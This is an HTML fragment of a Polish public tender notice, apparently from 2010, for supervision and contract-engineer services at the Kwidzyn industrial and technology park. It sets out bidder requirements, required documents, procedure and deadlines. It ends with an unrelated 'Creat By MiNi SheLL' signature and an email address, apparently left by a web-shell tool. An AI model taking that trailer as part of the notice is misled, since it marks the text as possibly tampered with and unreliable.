<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-1, 71.54.00.00-5, 71.63.00.00-3, 71.31.80.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium w niniejszym postępowaniu wynosi 10 000,00 zł. Zamawiający żąda wniesienia wadium w pełnej wysokości przed terminem do składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunek, jeżeli wykaże, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie usługi, których przedmiotem było pełnienie funkcji Nadzoru Inwestorskiego lub Inżyniera Kontraktu, sprawującego nadzór nad realizacją oraz prowadzącego rozliczenia i sprawozdawczość z realizacji co najmniej dwóch projektów obejmujących roboty budowlane, w tym jednego o wartości minimum 30 000 000,00 zł i jednego współfinansowanego ze środków Unii Europejskiej (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten może być spełniony łącznie)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunek jeżeli wykaże, iż dysponuje następującymi osobami wchodzącymi w skład tzw. personelu kluczowego: Kierownikiem Zespołu z wyższym wykształceniem budowlanym i co najmniej 8 letnim doświadczeniem zawodowym w kierowaniu zespołem ludzi, prowadzącym nadzór nad inwestycjami budowlanymi i/lub realizującym roboty budowlane, pełniący funkcję Kierownika Zespołu (lub Inżyniera Kontraktu, Przedstawiciela Wykonawcy lub równoważne) na co najmniej dwóch kontraktach (projektach) budowlanych, w tym: co najmniej jeden kontrakt (projekt) o wartości robót min. 20 000 000,00 PLN netto, co najmniej jeden kontrakt (projekt) współfinansowany ze środków Unii Europejskiej, minimum 2 osobami posiadającymi uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez ograniczeń, minimum 1 osobą posiadającą uprawnienia budowlane w specjalności architektonicznej bez ograniczeń w zakresie kierowania robotami budowlanymi w odniesieniu do architektury obiektu, minimum 1 osobą posiadającą uprawnienia drogowe bez ograniczeń, minimum 1 osobą posiadającą uprawnienia o specjalności telekomunikacyjnej bez ograniczeń, minimum 2 osobami posiadającymi uprawnienia o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, minimum 2 osobami posiadającymi uprawnienia o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, minimum 1 osobą - specjalistą ds. rozliczeń finansowych - posiadającą doświadczenie w rozliczaniu projektów inwestycyjnych współfinansowanych ze środków Unii Europejskiej, minimum 1 osobą - administratorem projektu - posiadającą doświadczenie w pracach administracyjno-biurowych lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia ww. osób zdolnych do wykonania zamówienia (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek ten może być spełniony łącznie). Wykonawcy z innych państw członkowskich UE mogą spełnić ten warunek składając dowód na posiadanie równoważnych do ww. uprawnień uzyskanych w swoich krajach pochodzenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunek jeżeli wykaże, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, w wysokości nie mniejszej niż 1 000 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>ZMIANA UMOWY 1. Zmiana postanowień zawartej umowy w zakresie zmiany terminu realizacji może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany w niżej wymienionych przypadkach: a) z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach, b) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron, c) z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa, d) z powodu uzasadnionych zmian w zakresie sposobu wykonywania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego, e) z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez doświadczonego Wykonawcę , robót, f) z powodu niekorzystnych warunków atmosferycznych, które uniemożliwiają realizację przedmiotu umowy zgodnie z obowiązującymi przepisami (warunkami technicznymi - normami), g) z powodu zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacja finansową , zdolnościami płatniczymi lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy. 2. Zmiana postanowień zawartej umowy w zakresie wynagrodzenia może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany w niżej wymienionych przypadkach: a) w przypadku zmiany technologii wykonania robót, na wniosek Wykonawcy lub Zamawiającego i pod warunkiem, że zmiana ta będzie korzystna dla Zamawiającego, b) w przypadku odstąpienia na wniosek Zamawiającego od realizacji części robót</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kppt.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kwidzyński Park Przemysłowo - Technologiczny Sp. z o.o., Górki 3, 82-500 Kwidzyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2010 godzina 10:00, miejsce: Kwidzyński Park Przemysłowo - Technologiczny Sp. z o.o., Górki 3, 82-500 Kwidzyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com